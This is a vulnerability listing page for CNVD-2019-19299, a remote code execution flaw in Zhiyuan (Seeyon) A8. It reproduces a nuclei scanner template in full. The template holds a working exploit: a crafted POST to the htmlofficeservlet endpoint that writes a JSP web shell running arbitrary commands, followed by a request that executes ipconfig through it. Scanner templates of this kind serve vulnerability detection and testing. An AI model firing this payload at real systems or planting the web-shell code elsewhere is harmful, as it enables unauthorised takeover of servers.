CNVD-2019-19299: Zhiyuan A8 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Zhiyuan A8 | POC: 已公开

漏洞描述

Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.

PoC代码[已公开]

id: CNVD-2019-19299

info:
  name: Zhiyuan A8 - Remote Code Execution
  author: daffainfo
  severity: critical
  description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
  reference:
    - https://www.cxyzjd.com/article/guangying177/110177339
    - https://github.com/sectestt/CNVD-2019-19299
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: cnvd2019,cnvd,zhiyuan,rce,intrusive

http:
  - raw:
      - |
        POST /seeyon/htmlofficeservlet HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Connection: close

        DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
        OPTION=S3WYOSWLBSGr
        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
        = WUghPB3szB3Xwg66 the CREATEDATE
        recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
        originalFileId = wV66
        originalCreateDate = wUghPB3szB3Xwg66
        FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
        needReadFile = yRWZdAS6
        originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
      - |
        GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_1, "htmoffice operate")'
          - 'contains(body_2, "Windows IP")'
        condition: and
# digest: 490a0046304402206b6533009765aa7b3a8c29cdbda0eb038cc6435786cd1bb3dd55da9d0f60621602204ed0b6f6c097358f89ee13744e4bf3c639961fc46c9e911c7ab474bcc9bcb658:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/cnvd/2019/CNVD-2019-19299.yaml